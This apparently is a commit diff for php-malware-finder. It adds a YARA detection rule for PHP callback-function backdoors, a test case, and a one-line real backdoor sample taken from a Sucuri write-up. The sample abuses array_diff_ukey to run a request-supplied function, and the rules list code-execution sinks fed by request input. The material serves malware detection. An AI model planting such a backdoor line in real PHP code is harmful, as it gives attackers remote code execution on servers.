summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rw-r--r--php-malware-finder/php.yar3
-rw-r--r--php-malware-finder/samples/real/sucuri_2014_04.php3
-rwxr-xr-xphp-malware-finder/tests.sh3
3 files changed, 8 insertions, 1 deletions
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index ab63da5..1659754 100644
--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -76,8 +76,9 @@ rule DodgyPhp
76 $basedir_bypass = /curl_init\s*\(\s*["']file:\/\// 76 $basedir_bypass = /curl_init\s*\(\s*["']file:\/\//
77 $basedir_bypass2 = "file:file:///" // https://www.intelligentexploit.com/view-details.html?id=8719 77 $basedir_bypass2 = "file:file:///" // https://www.intelligentexploit.com/view-details.html?id=8719
78 $disable_magic_quotes = /set_magic_quotes_runtime\s*\(\s*0/ 78 $disable_magic_quotes = /set_magic_quotes_runtime\s*\(\s*0/
79 $execution = /(eval|assert|passthru|exec|include|system|pcntl_exec|shell_execute|base64_decode|`|array_map|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase 79 $execution = /(eval|assert|passthru|exec|include|system|pcntl_exec|shell_execute|base64_decode|`|array_map|call_user_func(_array)?)\s*\(\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase // function that takes a callback as 1st parameter
80 $execution2 = /(array_filter|array_reduce|array_walk(_recursive)?|array_walk|assert_options|uasort|uksort|usort|preg_replace_callback|iterator_apply)\s*\(\s*[^,]+,\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase // functions that takes a callback as 2nd parameter 80 $execution2 = /(array_filter|array_reduce|array_walk(_recursive)?|array_walk|assert_options|uasort|uksort|usort|preg_replace_callback|iterator_apply)\s*\(\s*[^,]+,\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))/ nocase // functions that takes a callback as 2nd parameter
81 $execution3 = /(array_(diff|intersect)_u(key|assoc)|array_udiff)\s*\(\s*([^,]+\s*,?)+\s*(base64_decode|php:\/\/input|str_rot13|gz(inflate|uncompress)|getenv|pack|\\?\$_(GET|REQUEST|POST|COOKIE))\s*\[[^]]+\]\s*\)+\s*;/ nocase // functions that takes a callback as 2nd parameter
81 82
82 $htaccess = "SetHandler application/x-httpd-php" 83 $htaccess = "SetHandler application/x-httpd-php"
83 $iis_com = /IIS:\/\/localhost\/w3svc/ 84 $iis_com = /IIS:\/\/localhost\/w3svc/
diff --git a/php-malware-finder/samples/real/sucuri_2014_04.php b/php-malware-finder/samples/real/sucuri_2014_04.php
new file mode 100644
index 0000000..64bfa07
--- /dev/null
+++ b/php-malware-finder/samples/real/sucuri_2014_04.php
@@ -0,0 +1,3 @@
1<?php
2/* https://blog.sucuri.net/2014/04/php-callback-functions-another-way-to-hide-backdoors.html */
3@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);
diff --git a/php-malware-finder/tests.sh b/php-malware-finder/tests.sh
index 42c2456..6928e65 100755
--- a/php-malware-finder/tests.sh
+++ b/php-malware-finder/tests.sh
@@ -88,6 +88,9 @@ run_test artificial/bypasses.php 'DodgyPhp'
88run_test artificial/bypasses.php '0x6d:$execution: call_user_func_array($_POST' 88run_test artificial/bypasses.php '0x6d:$execution: call_user_func_array($_POST'
89run_test artificial/bypasses.php "0x132:\$var_as_func: \$_POST\['funct'\](" 89run_test artificial/bypasses.php "0x132:\$var_as_func: \$_POST\['funct'\]("
90 90
91# real
92run_test real/sucuri_2014_04.php '0x67:$execution3:'
93
91# Asp files 94# Asp files
92run_test_asp classic/cmdasp.asp 'DodgyStrings' 95run_test_asp classic/cmdasp.asp 'DodgyStrings'
93 96